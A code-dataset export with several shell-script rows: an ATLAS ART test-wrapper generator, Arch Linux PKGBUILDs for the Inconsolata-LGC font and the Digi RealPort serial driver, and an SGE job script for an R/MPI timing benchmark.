blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
d4a446a15f0457e4f57d8764afa2c99b67b817c4
|
Shell
|
rushioda/PIXELVALID_athena
|
/athena/Trigger/TrigValidation/TrigInDetValidation/scripts-art/makeart
|
UTF-8
| 822 | 2.96875 | 3 |
[] |
no_license
|
#!/bin/bash
# Generate ART test wrappers: for every job XML included by the main
# TestConfiguration file, resolve its sample include and dataset, run mkart,
# then install the resulting test_*.sh script into ../test.
# All expansions are quoted so job/sample names with unusual characters
# cannot word-split or glob.
# for job in $(grep TrigInDet ../TIDAbuild/makefile | grep -v \=| awk '{print $1}'); do
for job in $(grep include ../TIDAbuild/TrigInDetValidation_TestConfiguration_main.xml | grep -v "<\!-" | sed 's|.* \"||g' | sed 's|\".*||g'); do
    echo
    echo "$job"
    # First non-comment sample include referenced by the job file.
    SAMPLE=$(grep include "../TIDAbuild/$job" | grep sample | grep -v "<\!-" | head -1 | sed 's|.* \"||g' | sed 's|\".*||g')
    # Dataset name from the sample file's <dataset> element.
    DATASET=$(grep dataset "../TIDAbuild/$SAMPLE" | grep -v "<\!-" | head -1 | sed 's|.*<dataset>||g' | sed 's|</dataset>.*||g')
    echo "SAMPLE: $SAMPLE"
    echo "DATASET: $DATASET"
    # ls -ld $DATASET
    ../utils/mkart "../TIDAbuild/$job" -d "$DATASET" -o .
    # mkart emits test_<jobname lowercased>.sh
    _job=test_$(basename "$job" .xml | tr '[:upper:]' '[:lower:]')
    chmod 755 "$_job.sh"
    mv "$_job.sh" ../test
    ls -ld "../test/$_job.sh"
done
| true |
2107f1ae223dbdb04f34814dcb14723299069b7f
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/otf-inconsolata-lgc-git/PKGBUILD
|
UTF-8
| 1,163 | 2.609375 | 3 |
[
"MIT"
] |
permissive
|
# maintainer: tagener-noisu @ GitHub
pkgname=otf-inconsolata-lgc-git
_pkgname=otf-inconsolata-lgc
pkgver=1.3.0
pkgrel=1
pkgdesc="a modified version of Inconsolata with added Cyrillic alphabet"
url="https://github.com/MihailJP/Inconsolata-LGC/"
arch=('any')
license=('OFL')
makedepends=('git' 'fontforge')
provides=("$_pkgname")
conflicts=("$_pkgname")
source=("$_pkgname::git+https://github.com/MihailJP/Inconsolata-LGC.git")
md5sums=('SKIP')

# Derive the package version from the newest dotted-numeric git tag.
pkgver() {
  cd "$_pkgname"
  git describe --tags | grep -Po '(\d\.)+\d'
}

# Build the OTF fonts with fontforge via the project makefile.
build() {
  cd "$_pkgname"
  make otf
}

# Install the four font variants plus license and readme.
package() {
  cd "$_pkgname"
  local _variant
  for _variant in '' '-Bold' '-Italic' '-BoldItalic'; do
    install -m644 -D "Inconsolata-LGC${_variant}.otf" \
      "$pkgdir/usr/share/fonts/OTF/InconsolataLGC${_variant}.otf"
  done
  install -m644 -D LICENSE "$pkgdir/usr/share/licenses/$_pkgname/LICENSE"
  install -m644 -D README "$pkgdir/usr/share/doc/$_pkgname/README"
}
# vim:ts=2:sw=2:et:
| true |
7f59f49b77c5ae47771e24e8a9ced9b01cb4bc96
|
Shell
|
floswald/parallelTest
|
/R/clusterTime/timer.sh
|
UTF-8
| 772 | 2.90625 | 3 |
[] |
no_license
|
#!/bin/bash
# SGE batch script: runs an R/snow fibonacci timing benchmark under Open MPI
# on 20 slots. Submit with qsub; the "#$" lines below are scheduler
# directives parsed by qsub and must not be reformatted.
echo "starting qsub script file for fibonacci timer"
source ~/.bash_profile
date
# here's the SGE directives
# ------------------------------------------
#$ -q batch.q # <- the name of the Q you want to submit to
#$ -pe mpich 20 # mpich <- load the openmpi parallel env w/ $(arg1) slots
#$ -S /bin/bash # <- run the job under bash
#$ -N mpi-timing # <- name of the job in the qstat output
#$ -o timer.out # direct output stream to here
#$ -e timer.err # <- name of the stderr file.
#$ -cwd
#module add openmpi/gcc
module load openmpi
#module load open64
#module load gcc
module load r/3.1.3
echo "loaded modules"
module list
echo "calling mpirun now"
# RMPISNOW wraps R for snow clusters; -np 20 must match the -pe directive above.
mpirun -np 20 ~/R/x86_64-unknown-linux-gnu-library/3.1/snow/RMPISNOW -q < timer.r > timer.Rout
| true |
56de62c2c8e08be25a9f7f696a0ce7f0b880525c
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/dgrp/PKGBUILD
|
UTF-8
| 23,589 | 2.8125 | 3 |
[] |
no_license
|
# Maintainer: Chris Severance aur.severach aATt spamgourmet dott com
# Todo: rewrite dgrp_cfg_node to be systemd compatible.
# Todo: add systemd getty support to drpadmin
# Todo: Default user, group, and mode are in the backing store. These do not work. They are set by udev and apply to all ports.
# Digi bug: terminal freezes when viewing /proc/dgrp/mon
# Digi bug: drpd terminates after the first tty open when launched from dgrp_cfg_node. It stays working when launched by systemd restart
# Digi bug: occasional Can't open serial /dev/ttyaf00: Resource temporarily unavailable for PortServer TS (not II)
# Digi bug: occasional dropped characters for PortServer II, PortServer TS, Digi One
# Digi bug: Digi RealPort Manager (java) is unable to add new Realport because it uses the wrong options
# Digi bug: mbrowse reports a few parsing errors in MIB
# Digi bug: make compatible with OpenSSL 1.1
# Digi bug: transfer hangs if unit is repowered during live connection. Tested in 4.11, 4.9, and 4.4
# Digi Realport driver for Arch Linux. See Digi release notes for supported products.
# Build instructions: (Skip these first two sections)
# This only applies if you installed a long time ago when this driver would still
# compile and haven't upgraded in a while. Now this can't be built on Arch without a
# patch so new users skip to the next section.
# This PKGBUILD does not clean up the slop from the Digi supplied make.
# If you have already installed according to the instructions
# log on as root and go through the process in reverse from the original
# unmodified Digi tgz. You won't lose your configuration.
# make preuninstall; make uninstall
# To clean up you may want to remove the folders /share/ and /etc/init.d/
# Arch Linux does not use these folders though they may have spurious files from
# other misdirected installs.
# The next section: ... Now onto the real install ...
# Edit PKGBUILD.local after the first run
# Bootstrap a user-editable options file on the first run; later runs source
# the existing file, so local customizations survive package upgrades.
# The heredoc body below is written verbatim into PKGBUILD.local.
if [ ! -s 'PKGBUILD.local' ]; then
cat > 'PKGBUILD.local' << EOF
# Set the mode for all created devices.
_opt_defaultmode="0660" # default: 0600
_opt_defaultgroup="uucp" # default: root
# If you need more granular control.
# See http://knowledge.digi.com/articles/Knowledge_Base_Article/HOW-TO-Preserve-device-permissions-settings-with-RealPort-in-Linux/
# Once set copy /etc/udev/rules.d/10-dgrp.rules to the PKGBUILD folder
# and it will be made into the package.
# Digi's product name is inconsistent. Here you can choose. RealPort seems the most popular.
_opt_RealPort='RealPort' # Can also be Realport
_opt_DKMS=1 # This can be toggled between installs
EOF
fi
# Pull the (possibly user-edited) options into this PKGBUILD.
source 'PKGBUILD.local'
# Since the kernel module isn't loaded until you have a device
# configured, these services are automatically enabled and started
# for immediate hardware support. They will be reenabled each time the
# package is installed or upgraded.
# systemctl enable dgrp_daemon.service
# systemctl start dgrp_daemon.service
# systemctl enable dgrp_ditty.service
# systemctl start dgrp_ditty.service
# To stop these services from loading:
# systemctl disable dgrp_daemon.service
# systemctl stop dgrp_daemon.service
# systemctl disable dgrp_ditty.service
# systemctl stop dgrp_ditty.service
# To get started using your Digi products:
# man -Ik "Digi "
# man dgrp_gui
# man dgrp_cfg_node
# man ditty
# man drpadmin
# The man page for dgrp_cfg_node lacks some detail. See this page for more info
# ftp://digiftp.digi.com/support_archive/support/manuals/psts/rp-linux-conf-managing-portservers-with-dgrp-config-node.html
# To get your equipment up faster on servers that don't have X installed
# I've supplied a console shell script "drpadmin".
# It is adapted from Digi's RealPort "drpadmin" for Sun, HP UX, and SCO and has the same
# look and feel.
# Show available Digi devices
# addp.pl -Q
# For information about using dgrp_ditty.service to maintain your ditty settings
# across reboots see http://knowledge.digi.com/articles/Knowledge_Base_Article/How-do-I-configure-my-ditty-rp-port-settings-to-stay-after-rebooting-when-using-RealPort-in-Linux/
# UnInstall cleanup:
# rm /etc/dgrp.backing.store* /usr/bin/dgrp/config/ditty.commands
# rmdir /usr/bin/dgrp/config
# rmdir /usr/bin/dgrp
set -u
pkgname='dgrp'
pkgver='1.9.38'
pkgrel='1'
pkgdesc="tty driver for Digi ${_opt_RealPort} ConnectPort EtherLite Flex One CM PortServer TS IBM RAN serial console terminal servers"
#_pkgdescshort="Digi ${_opt_RealPort} driver for Ethernet serial servers" # For when we used to generate the autorebuild from here
arch=('i686' 'x86_64')
url='https://www.digi.com/'
license=('GPL' 'custom') # OpenSSL=Apache. Arch is always new enough to not need their version.
depends=('openssl-1.0' 'grep' 'awk' 'systemd' 'procps-ng' 'psmisc' 'perl')
optdepends=(
{tk,gksu}': Digi RealPort Manager GUI'
'java-runtime: Digi Device Discovery Tool GUI'
'mbrowse: SNMP browser GUI'
)
backup=('etc/dgrp.backing.store')
options=('!docs' '!emptydirs')
install="${pkgname}-install.sh"
_verwatch=('https://www.digi.com/support/includes/drivers.aspx?pid=1954&osvid=218' '<li>.*RealPort Driver for Linux ver\. \([0-9\.]\+\), tgz version.*' 'f')
_mibs=(
'40002014_a.mib' # DIGI Connectware Manager Notifications
'40002194_H.mib' # Portserver TS MIB File
'40002195_P.mib' # Digi Structures of Management (SMI) MIB
'40002236_b.mib' # Digi MODBUS MIB
'40002237_c.mib' # Digi Power Supply MIB
'40002238_b.mib' # Digi Multi-Electrical Interface (MEI) MIB
'40002239_B.mib' # Digi Socket ID MIB File
'40002240_B.mib' # Portserver TS Port Buffering MIB File
'40002257_B.mib' # Digi IA MIB
'40002258_B.mib' # Digi UDP Serial MIB
'40002335_B.mib' # Portserver TS Secure Access MIB File
'40002336_C.mib' # Digi Power Management MIB File
'40002337_D.mib' # Digi Power Management Traps MIB
'40002338_D.mib' # Digi Keyword Notification MIB
'40002339_D.mib' # Digi Login Traps MIB
'40002410_a.mib' # DIGI Connect Device Info Management Information Base
'40002411_a.mib' # Digi Connect Serial Alarm Traps MIB
'40002478_B.mib' # Digi NFS TRAPS MIB
'40002479_F.mib' # CM Management Information Base
'40002514_a.mib' # Digi Connectware Manager Notifications MIB
'40002515_a.mib' # Digi Connect Device Identity MIB
'40002520_a.mib' # Digi Power Traps MIB
'40002709_C.mib' # Digi ConnectPort LTS MIB
'rfc1316.mib' # Portserver II RFC1316-MIB Definitions
'rfc1317.mib' # Portserver II RFC1317-MIB Definitions
)
# Let me know if these dnw (do not want) items are actually serial device servers and should be installed.
_mibsdnw=(
'40002325_D.mib' # DIGI Wireless Lan Management Information Base
'40002370_C.mib' # DIGI Serial Traps Management Information Base
'40002436_B.mib' # DIGI Modem Test Traps Management Information Base
'40002477_B.mib' # Management Information Base
'40002519_F.mib' # Passport Management Information Base
'40002521_a.mib' # DIGI IPMI Notification Feature Management Information Base
'40002593_B.mib' # DIGI Connect Mobile Information Management Information Base
'40002594_a.mib' # DIGI Mobile Traps Management Information Base
'40002782_a.mib' # Passport Management Information Base
'40002846_A.mib' # DIGI Connect Mobile Status Management Information Base
)
_mibsrc='http://ftp1.digi.com/support/utilities/'
_filever="${pkgver//\./-}"
_filever="${_filever/-/.}"
source=(
#"${pkgname}-${pkgver}-81000137_X.tgz::http://ftp1.digi.com/support/driver/81000137_X.tgz"
#"${pkgname}-${pkgver}-beta.tgz::ftp://ftp1.digi.com/support/driver/RealPort%20Linux%20Beta%20Driver/dgrp-${_filever}_y1p.tgz.rpm"
"${pkgname}-${pkgver}-81000137_Y.tgz::http://ftp1.digi.com/support/driver/81000137_Y.tgz"
'drpadmin' 'drpadmin.1' # "autorebuild-${pkgname}.sh"
'addp_perl-1.0.tgz::https://github.com/severach/addp/archive/f92a6fd2050c9f32a5a11cac18cd9def78138530.tar.gz'
'ftp://ftp1.digi.com/support/utilities/AddpClient.zip'
'dgrp-patch-signal_pending-kernel-4-11.patch'
"${_mibs[@]/#/${_mibsrc}}"
)
unset _mibsrc
#source_i686=('http://ftp1.digi.com/support/utilities/40002890_A.tgz')
#source_x86_64=('http://ftp1.digi.com/support/utilities/40002889_A.tgz') # compiled i686 therefore worthless
# addp and sddp are incomplete. I replaced them with addp.pl
sha256sums=('e474518da5b3feddd1f4dd0083ac8125e34ba07da9884cbd3ebd1955006891d7'
'42898b9d24262de27e9b1f3067d51d01373810b7c9e4991403a7f0a5dd7a26cf'
'66f8b106a052b4807513ace92978e5e6347cef08eee39e4b4ae31c60284cc0a3'
'9d79df8617e2bb1042a4b7d34311e73dc4afcdfe4dfa66703455ff54512427f5'
'00d7b452a4f16599f7162f512a05599614115554992b872fc5302b521ea04468'
'83c90a2a9518fde5f500f336a181e86662b62065929bedd60fbd380dc2f4a9da'
'4b54148008b02a2544d8b33f07c471a068b0973ac5402967af8bf73a28b6a8b6'
'a1833d877b07b0f424676241b3e1070e116d07965db3131a61a3b6ce0ff90063'
'6fca5df11304d905f561a0c251419619960a8da8e724d36b34e9977e97f02528'
'2dd7868acf66c14d67012a2263088b08d8f9320c64b64db94740fae54b485c78'
'26159071b1b0df2af04d612e32ce72c8835f241c56b9fa2dadee53d9d127d0b7'
'f686011f7db06f0632f6460566da751a00fccd04bb1527b8a83239aad46d4de5'
'50130240e3ce85759aa99b3a268568de6a97084eeb40a92ef0b4937333808d8a'
'f4a89790ad1413ecfc2b723a45fa0d0b93ae01cc433d930db4e689f82d0367fd'
'3e2881ebf6866751a64e7cf948b85a3c2053f2d0a8799234c56b732cde17b853'
'c54576fad5ccedfd50cebc22a6dd45bd8c4deb875282f5c7d1a89a33426c1746'
'08eecc0e5d8f9fffe0fcf3b9f47e56c81bd713964bd7aeb0f4b6a6de3e0f3592'
'75ba60917769c2cc2324050b74a4e618f0904464ece15646045fd931001c47e4'
'43e7f12bb32343254f472260fd26566e8aab58764ba3e73d500542e462f27ac5'
'241ef4a96b4d34652bfc7a9ce0bab317129e0123f05c68713a45d88624ddd19b'
'21b8d7c50cacc418611b909159ed6258dc13026e8e55034e86965227b8176509'
'471f1342398c4fce86e1d437c4f6053be75ae3a99337613d39c05e4e3c80ede9'
'06a81a5dfaa1c61944d1a12d2efc8129c0ee72f630817f844879bd17d6cb4d80'
'a3286df00ca3566361faf1f128752c56d046558277cd90025831f9840129e33f'
'33b29ee72b590ecadd54e893317a279bb49a2dd4a189fd386491e1a67ef193a8'
'4011005db626db67b50f13b6242db1fed0d11b0d89e56af7ae39f5719d7cd323'
'679b081c31e5fc156ad9c55afc0bba9ec354f37e28eeeb453bcbd6b1cf68988e'
'731e05fc551367faa6ad5dc317eedf305388ab12db196c0a1361a3d01bd35279'
'c471cafa43503a40d43b42acd8bc6ef49db29e55a74e0494c85f729ea45fe243'
'5cac7ce2e6f043127f314b93694af021ae7820ffb5bf3de343da7a240d05e9c8'
'8654496d83c083e457e8bb9bae2b1e71804d156a38c284d89872d0125eba947d')
# DKMS builds rebuild the module per kernel, so headers are a runtime
# dependency; a non-DKMS build only needs headers at package build time.
if [ "${_opt_DKMS}" -ne 0 ]; then
depends+=('linux' 'dkms' 'linux-headers')
else
makedepends+=('linux-headers')
fi
# Check for updates and case errors to the 2 mib lists
# Maintainer helper, not part of a normal build (see the commented-out call
# below). Scrapes Digi's FTP listing, keeps only the newest revision of each
# 4000*.mib file, and reports entries that are newer than, cased differently
# from, or missing in the _mibs/_mibsdnw arrays above. Always returns 1 so a
# stray call cannot be mistaken for a successful build step.
_fn_mibcheck() {
echo 'Checking for newer and misnamed MIB'
local line
local linea
local file='/tmp/PKGBUILD.mibs'
# Get list of files
while IFS='' read -r line || [[ -n "${line}" ]]; do
# Field 9 of an FTP LIST line is the filename.
read -r -a linea <<<"${line}"
line="${linea[8]}" # filename
case "${line}" in
4000*.mib)
echo "${line}" >> "${file}"
;;
esac
done < <(curl -s 'ftp://ftp1.digi.com/support/utilities/') # curl is sorted and case insensitive because Digi runs WSFTP. We can't assume this will be always so.
# get list of latest files
# Collapse the case-insensitively sorted list to one (newest) entry per
# base name: the part before the first '_' identifies the document.
local lineu linep lineup
lineup=''
linep=''
linea=()
while IFS='' read -r line || [[ -n "${line}" ]]; do
lineu="${line^^}"
if [ "${lineup%%_*}" != "${lineu%%_*}" ] && [ ! -z "${linep}" ]; then
linea+=("${linep}")
fi
lineup="${lineu}"
linep="${line}"
done < <(sort -f "${file}")
rm -f "${file}"
linea+=("${linep}")
# Check against _mibs
local found mib mibu
for line in "${linea[@]}"; do
lineu="${line^^}"
found=0
for mib in "${_mibs[@]}" "${_mibsdnw[@]}"; do
mibu="${mib^^}"
if [ "${lineu%%_*}" = "${mibu%%_*}" ]; then
if [ "${lineu}" != "${mibu}" ]; then
echo "${mib} has been updated to ${line}"
elif [ "${line}" != "${mib}" ]; then
echo "Case correction: ${mib} -> ${line}"
fi
found=1
break
fi
done
if [ "${found}" -eq 0 ]; then
echo "${line} is missing"
fi
done
return 1
}
#_fn_mibcheck
# bash -c 'source PKGBUILD; _fn_mibcheck'
# Patch the vendor source tree before building: normalize the RealPort
# branding, fix paths for Arch (/usr/lib/modules, no /sbin), and rewrite the
# vendor install/uninstall scripts so pacman owns files and links. Note the
# sed "-e '# …'" entries are no-op sed comments used to annotate the
# following expression; they are part of the sed programs, not shell comments.
prepare() {
set -u
cd dgrp-*/
rm -f daemon/openssl-*.tar.gz # I don't want their version to build if OpenSSL version detection fails in the future
# Standardize name of RealPort
sed -e "s/RealPort/${_opt_RealPort}/gI" -i $(grep -lrF $'RealPort\nRealport' .)
# grep -ri realport . | grep -vF $'RealPort\nRealport'
sed -e '# Cosmetic fix for newer gcc compilers' \
-e 's:\(3.9\*|4.\*\))$:\1|5.*|6.*|7.*):g' \
-e "# I can't find any other way to fix the modules dir" \
-e 's:/lib/modules/:/usr&:g' \
-e '# Kill a harmless mkdir error. They mkdir the folder then dont use it.' \
-e 's@^\(\s\+\)\(mkdir -p /usr/lib/modules/${osrel}/misc\)$@\1: #\2@g' \
-i 'configure'
# Eradicate sbin before we even get started
sed -e 's:/usr/sbin:/usr/bin:g' -e 's:/sbin/:/usr/bin/:g' -i 'configure' Makefile* */Makefile scripts/{preun,post}install
# Fix the installers. We do in PKGBUILD what we can and the just a little in install.
# cp -p 'scripts/postinstall' 'scripts/postinstall.Arch' # DEBUG for comparison
sed -e '# Some security for root' \
-e 's:^#!\s*/bin/sh$:&\nif [ "${EUID}" -ne 0 ]; then\n echo "Must be root!"\n exit 1\nfi:g' \
-e '# Remove Install noise' \
-e 's:^\(\s*\)\(echo "Running\):\1#\2:g' \
-e '# Block the usage of chkconfig' \
-e 's:/usr/bin/chkconfig:/usr/bin/true:g' \
-e '# Remove noise for defunct chkconfig' \
-e 's:^\(\s\+\)\(echo "Added\):\1#\2:g' \
-e '# Automatically bring back pacsave file on reinstall' \
-e 's:^if \[ -f /etc/dgrp:if [ -s "/etc/dgrp.backing.store.pacsave" -a ! -s "/etc/dgrp.backing.store" ]; then\n mv "/etc/dgrp.backing.store.pacsave" "/etc/dgrp.backing.store"\nfi\n&:g' \
-e '# No need to upgrade and back up a blank file' \
-e 's:-f \(/etc/dgrp.backing.store\):-s \1:g' \
-e '# Why depend on /tmp when we can use the /etc folder which is where admin will be looking to fix their non working hardware' \
-e 's:/tmp/dgrp/dgrp.backing.store:/etc/dgrp.backing.store:g' \
-e '# The rest is done in package.' \
-e 's:^echo "Checking:exit 0\n&:g' \
-e '# Prepare the links for package to use them' \
-e 's:^\(\s\+\)ln -s /usr/bin/\([^ ]\+\) \(.\+\)$:\1ln -sf "\2" "${_DESTDIR}\3":g' \
-e "# All that's left is config conversion" \
-i 'scripts/postinstall'
#cp -p 'scripts/preuninstall' 'scripts/preuninstall.Arch' # For comparison
sed -e '# Some security for root' \
-e 's:^#!\s*/bin/sh$:&\nif [ "${EUID}" -ne 0 ]; then\n echo "Must be root!"\n exit 1\nfi:g' \
-e '# Remove UnInstall noise' \
-e 's:^\(\s*\)\(echo "Running\):\1#\2:g' \
-e '# Block the usage of chkconfig' \
-e 's:/usr/bin/chkconfig:/usr/bin/true:g' \
-e '# Remove more noise' \
-e 's:^\(\s\+\)\(echo "Removed\):\1#\2:g' \
-e '# No need to sleep. The daemons are shut down by systemd' \
-e 's:^sleep :#&:g' \
-e '# pacman handles the links and files' \
-e 's;if \[ -L ;if ! : \&\& [ -L ;g' \
-e 's;^\(\s*\)\(rm -f \);\1: #\2;g' \
-e '# Fixing this file was almost useless. All it does after we disable everything is an rmmod' \
-i 'scripts/preuninstall'
# Guard: fail if the DEBUG comparison copies above were left enabled.
test ! -f 'scripts/postinstall.Arch' -a ! -f 'scripts/preuninstall.Arch'
# Change insmod to modprobe
sed -e 's:\${INSMOD}.*$:modprobe "${DGRP_DRIVER}" # &:g' -i 'config/dgrp_cfg_node'
# drpd makefile does not honor --with-ssl-dir. We convert the bogus folder to the one we need.
sed -e 's:/usr/local/ssl/include:/usr/include/openssl-1.0:g' \
-e 's:/usr/local/ssl/lib:/usr/lib/openssl-1.0:g' \
-i 'daemon/Makefile.in'
# Branding in dmesg
sed -e 's@ please visit [^"]\+"@ please visit https://aur.archlinux.org/packages/dgrp/"@g' \
-e '/^dgrp_init_module/,/^$/ s@version: %s@& Arch Linux@g' \
-i driver/[0-9]*/dgrp_driver.c
set +u
}
# Configure (once) against openssl-1.0 and build everything single-threaded.
build() {
set -u
cd dgrp-*/
# Skip configure on rebuilds when a Makefile already exists.
if [ ! -s 'Makefile' ]; then
# this generates a harmless error as it tries to make a folder in /usr/lib/modules...
# --with-ssl-dir supplies to -I but mainly for configure. CFLAGS goes everywhere.
# --with-ssl-dir is supplied to -L too which is worthless. We amend with LDFLAGS.
CFLAGS="${CFLAGS} -I/usr/include/openssl-1.0" \
LDFLAGS="${LDFLAGS} -L/usr/lib/openssl-1.0" \
./configure -q --sbindir='/usr/bin' --prefix='/usr' --mandir='/usr/share/man' --with-ssl-dir='/usr/include/openssl-1.0'
fi
#. 'config/file_locations.Arch'
make -s all -j1 # This package doesn't support threaded make and it's too small to fix
set +u
}
# Copy this line into the .install file
_daemons=('daemon' 'ditty')
# Stage the vendor install into $pkgdir, then fix it up for Arch: symlinks,
# MIB files, udev rules, systemd units, the drpadmin helper, desktop entries
# and (optionally) a DKMS source tree instead of a prebuilt module.
package() {
set -u
if [ "${_opt_DKMS}" -eq 0 ]; then
# I don't want Linux version info showing on AUR web. After a few months 'linux<0.0.0' makes it look like an out of date package.
local _kernelversionsmall="$(uname -r)"
_kernelversionsmall="${_kernelversionsmall%%-*}"
_kernelversionsmall="${_kernelversionsmall%\.0}" # trim 4.0.0 -> 4.0, 4.1.0 -> 4.1
# prevent the mksrcinfo bash emulator from getting these vars!
eval 'conf''licts=("linux>${_kernelversionsmall}" "linux<${_kernelversionsmall}")'
eval 'dep''ends+=("linux=${_kernelversionsmall}")'
fi
cd dgrp-*/
#. 'config/file_locations.Arch'
make -s -j1 RPM_BUILD_ROOT="${pkgdir}" install
install -m644 'dinc/dinc.1' -t "${pkgdir}/usr/share/man/man1/" # They bypass the Makefile that does this
chmod 644 "${pkgdir}/usr/bin/dgrp/config"/{dgrp.gif,file_locations}
chmod 744 "${pkgdir}/usr/bin/"{dgelreset,dgipserv}
# Create the links, customized for us by prepare above
# (prepare rewrote the 'ln -s' lines to honor _DESTDIR; replay them here.)
grep 'ln -sf ' 'scripts/postinstall' |\
_DESTDIR="${pkgdir}" \
sh -e -u -s --
#rmdir "${pkgdir}/usr/share/doc" # makepkg does this for us
# Install MIB
local _mib
for _mib in "${srcdir}"/*.mib; do
install -Dpm0644 "${_mib}" "${pkgdir}/usr/share/snmp/mibs/digi-serial-server-${_mib##*/}.txt"
done
# Prepend our message on the udev rules file
install -dm755 "${pkgdir}/etc/udev/rules.d/"
touch "${pkgdir}/${backup[0]}" # postinstall handles the pacsave file automatically
chmod 644 "${pkgdir}/${backup[0]}"
sed -e 's:^KERNEL=="cu_dgrp:#&:g' -i "${pkgdir}/tmp/dgrp/10-dgrp.rules" # Recommended by Digi
cat > "${pkgdir}/etc/udev/rules.d/10-dgrp.rules" << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
# Generated: $(date +"%F %T")
# Warning: If you modify this file you should copy it into the folder with the
# PKGBUILD or you might lose the customizations on the next install.
# This file was customized by the PKGBUILD by setting the mode on all ports
# to MODE=(see below). If all you need is a different mode on all ports
# then set the option in the PKGBUILD. If you need more granular control
# see these customization instructions:
# http://knowledge.digi.com/articles/Knowledge_Base_Article/HOW-TO-Preserve-device-permissions-settings-with-RealPort-in-Linux/
# Then copy this file into the folder with PKGBUILD.
$(cat "${pkgdir}/tmp/dgrp/10-dgrp.rules")
EOF
rm -f "${pkgdir}/tmp/dgrp/10-dgrp.rules"
rmdir "${pkgdir}/tmp/dgrp" "${pkgdir}/tmp" # crashes if other files ever show up in /tmp/dgrp
# Apply the blanket mode/group chosen in PKGBUILD.local, if any.
if [ ! -z "${_opt_defaultmode:-}" ]; then
sed -e 's:^\(KERNEL=="tty_dgrp\)\(.*\)$:\1\2, MODE="'"${_opt_defaultmode}"'", GROUP="'"${_opt_defaultgroup}"'":g' -i "${pkgdir}/etc/udev/rules.d/10-dgrp.rules"
fi
# A user-supplied rules file next to the PKGBUILD overrides everything.
if [ -s "${srcdir}/../10-dgrp.rules" ]; then
cp "${srcdir}/../10-dgrp.rules" "${pkgdir}/etc/udev/rules.d/10-dgrp.rules" # no cp -p in case this file has any wrong user:group
fi
chmod 644 "${pkgdir}/etc/udev/rules.d/10-dgrp.rules"
# Relocate the SysV init scripts; systemd units below wrap them.
install -Dpm755 "${pkgdir}/etc/init.d"/{dgrp_daemon,dgrp_ditty} -t "${pkgdir}/usr/bin/dgrp/daemon/"
rm -f "${pkgdir}/etc/init.d"/{dgrp_daemon,dgrp_ditty}
rmdir "${pkgdir}/etc/init.d"
# systemd integration.
#install -dm755 "${pkgdir}/usr/lib/systemd/system/"
local _daemon
for _daemon in "${_daemons[@]}"; do
install -Dm644 <(cat << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
[Unit]
Description="Digi ${_opt_RealPort} ${_daemon}"
After=network.target
[Service]
Type=forking
ExecStart=/usr/bin/dgrp/daemon/dgrp_${_daemon} start
ExecStop=/usr/bin/dgrp/daemon/dgrp_${_daemon} stop
ExecReload=/usr/bin/dgrp/daemon/dgrp_${_daemon} reload
[Install]
WantedBy=multi-user.target
EOF
) "${pkgdir}/usr/lib/systemd/system/dgrp_${_daemon}.service"
#chmod 644 "${pkgdir}/usr/lib/systemd/system/dgrp_${_daemon}.service"
done
# Install my custom drpadmin with man page.
install -Dm755 "${srcdir}/drpadmin" -t "${pkgdir}/usr/bin/"
sed -e 's/^#distro=:::$/g_distro="Arch Linux"/g' \
-e "s/RealPort/${_opt_RealPort}/gI" -i "${pkgdir}/usr/bin/drpadmin"
install -Dm444 "${srcdir}/drpadmin.1" -t "${pkgdir}/usr/share/man/man1/"
# Standardize name of RealPort in man pages
sed -e "s/RealPort/${_opt_RealPort}/gI" -i "${pkgdir}/usr/share/man/man8/"*.8 "${pkgdir}/usr/share/man/man1/"*.1
# Desktop file for config tool
install -Dm644 <(cat << EOF
[Desktop Entry]
Name=Digi RealPort Manager
GenericName=Device Server Manager
Comment=Manage tty connections to Digi serial device servers
Exec=gksudo -k -u root dgrp_gui
Terminal=false
Type=Application
#Icon=
Categories=Application;Utility;
MimeType=application/x-executable
EOF
) "${pkgdir}/usr/share/applications/dgrp_cfg.desktop"
# addp tui and gui utilities
#install -Dpm755 "${srcdir}/addp" -t "${pkgdir}/usr/bin/"
install -Dpm755 "${srcdir}"/addp-*/'/addp.pl' "${pkgdir}/usr/bin/"
install -Dpm644 "${srcdir}/AddpClient.jar" -t "${pkgdir}/usr/bin/dgrp/"
# Desktop file for config tool
install -Dm644 <(cat << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
[Desktop Entry]
Name=Digi Device Discovery Tool
GenericName=Device Server Manager
Comment=Manage Digi serial device servers
Exec=java -jar /usr/bin/dgrp/AddpClient.jar
Terminal=false
Type=Application
#Icon=
Categories=Application;Utility;
MimeType=application/x-executable
EOF
) "${pkgdir}/usr/share/applications/AddpClient.desktop"
# DKMS
if [ "${_opt_DKMS}" -ne 0 ]; then
# Ship sources for DKMS instead of the module built above.
rm -rf "${pkgdir}/usr/lib/modules/"
local _dkms="${pkgdir}/usr/src/${pkgname}-${pkgver}"
install -Dm644 <(cat << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
PACKAGE_NAME="${pkgname}"
PACKAGE_VERSION="${pkgver}"
AUTOINSTALL="yes"
BUILT_MODULE_NAME[0]="dgrp"
BUILT_MODULE_LOCATION[0]="driver/build"
# Using all processors doesn't compile this tiny module any faster.
MAKE[0]="make -j1 -C 'driver/build'"
CLEAN[0]="make -j1 -C 'driver/build' clean"
# Placing the DKMS generated module in a different location than the standard install prevents conflicts when PKGBUILD _opt_DKMS is toggled
DEST_MODULE_LOCATION[0]="/kernel/drivers/misc"
EOF
) "${_dkms}/dkms.conf"
install -dm755 "${_dkms}/driver/build/"
cp -pr 'driver/build/' "${_dkms}/driver/"
cp -pr 'commoninc/' "${_dkms}/"
install -pm644 'Makefile.inc' -t "${_dkms}/"
sed -e 's:/usr/lib/modules/[^/]\+/:/usr/lib/modules/$(KERNELRELEASE)/:g' \
-i "${_dkms}/driver/build/Makefile"
make -C "${_dkms}/driver/build/" clean
fi
set +u
}
